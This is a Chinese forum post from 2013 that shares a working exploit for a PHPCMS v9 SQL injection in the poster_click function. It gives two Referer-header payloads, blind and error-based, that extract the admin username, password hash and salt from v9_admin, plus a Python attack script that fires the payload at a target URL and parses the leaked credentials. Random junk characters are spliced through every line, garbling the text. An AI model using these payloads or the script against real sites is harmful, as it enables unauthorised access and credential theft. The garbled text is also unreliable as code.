有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:3 y6 W: J$ `7 Q2 K6 Z$ ~: T
) E4 R3 j% S6 p! e问题函数\phpcms\modules\poster\index.php
$ {2 b: u }" Q0 f! V, f0 h4 a3 ~7 L' V
public function poster_click() {
4 l/ o+ w% {/ n. M$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
4 b, ?* {: E# Q- I7 q( \; O6 `$r = $this->db->get_one(array('id'=>$id));2 a6 I! }' g3 A' v
if (!is_array($r) && empty($r)) return false;4 H1 Q; P. @9 a c9 g
$ip_area = pc_base::load_sys_class('ip_area');
+ u! Q" ]0 z' W! w1 l3 e$ip = ip();
6 y/ u) Y7 v& M& N/ c1 A$area = $ip_area->get($ip);0 Y a; C9 k; ~1 M- k
$username = param::get_cookie('username') ? param::get_cookie('username') : '';" i+ j2 ?/ E) i6 [
if($id) {
9 `# V K- D8 S5 u( o$ U$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();4 d1 A( Q. L, J7 F
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));+ X, }. E' h u! Z$ d) c
}( m5 d: H; }1 {7 U
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
9 O% q( s) a @$setting = string2array($r['setting']);
" a- C- Z( Y5 |7 S' \$ P/ Nif (count($setting)==1) {9 k+ [5 @: K2 p' Y8 |
$url = $setting['1']['linkurl'];7 v" I9 M" a, S
} else {4 F0 g8 W7 r5 {0 a l
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];( y$ m+ u, ]( G
}
7 {4 b! ^9 N: t( [4 eheader('Location: '.$url);
* o" k$ e. h: h; p* Y0 u}
5 B) A/ o& w' m$ j4 U& F. _3 E/ ~7 {8 y% Z% g, b
8 x+ n* q' ~/ Z2 n# V
$ S6 H5 c$ m, O9 c7 R" j利用方式:
E& s( P+ t. `9 M2 t( q. r9 x2 s4 ~: N
1、可以采用盲注入的手法:
, T/ ^ Q/ Z, z, U9 I2 ~ A
' p. F! g" D9 breferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#' w3 R9 H, s, P$ W' c& W
2 X3 s" }1 M Z6 S/ w9 ?通过返回页面,正常与否一个个猜解密码字段。+ z \. r8 ]% `4 `$ N6 w
0 M+ h! f) \: V0 r6 e4 j& F1 Q2 \2、代码是花开写的,随手附上了:
; _" p4 T' r. \/ b3 Z5 g
! W5 E6 P3 F9 u3 E7 M1 G1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
& Q1 y( g) r" E! k9 W2 g
* ~2 W, Y4 q7 F: h3 A此方法是爆错注入手法,原理自查。
+ M5 [/ Z) m k, a3 \. _) a3 y5 d9 ^7 [0 j Y* t
* k( [; Y* @8 r
4 Z9 Z# g+ U* k: V利用程序:
1 k4 @% h: K3 j/ S5 G
7 ]+ O0 p4 U1 L |#!/usr/bin/env python! F4 h% o# ]& C6 N* F4 o7 j/ g& R
import httplib,sys,re+ F) i$ x) ]) w& v
, V5 e# |5 V N1 U V: l- x8 Rdef attack():
6 }2 F: Z# A' Rprint “Code by Pax.Mac Team conqu3r!”
& K9 v$ q6 J" L7 ?# S& jprint “Welcome to our zone!!!”
0 K) [& q# Q0 V' }5 X F vurl=sys.argv[1]
/ {& W3 M/ O& o- X2 E' G$ f1 Spaths=sys.argv[2]1 [; ^3 q5 L6 M9 }0 n2 R
conn = httplib.HTTPConnection(url)
5 w/ Z9 P3 V) X, i7 L3 fi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
( H( L- f+ ?! I6 [“Accept”: “text/plain”,
* @& b. x+ o% f. y“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
# [+ E' _/ U) q- G7 h7 Tconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
3 K7 ?9 n# B- }; Or1 = conn.getresponse()
7 R0 @3 }# u: X: Xdatas=r1.read()* [6 X: t% d: ~$ B/ M
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
?/ S1 {3 O' E/ qprint datas[0]
- d9 y7 Z4 E& |/ s& p! Lconn.close()
2 D7 X7 m, O# o1 o3 X2 eif __name__==”__main__”:$ k) f1 W# ^; B. Q% _5 x
if len(sys.argv)<3:! m9 N! t+ W E( ~
print “Code by Pax.Mac Team conqu3r”
k+ d0 j+ |$ S7 W [% dprint “Usgae:”6 p8 Z) k5 h6 O. I; {. ?9 u! B
print “ phpcmsattack.py www.paxmac.org /”% P, M1 q' j$ e4 C
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
% {5 a/ G6 f! A* m$ |6 Asys.exit(1)
( _0 S9 V4 J. J2 A6 e- Zattack()' J& P4 Y r7 J9 n9 D
6 x% ^, N/ v% B
|
发表于 2013-1-11 21:01:00
收藏
分享
支持
反对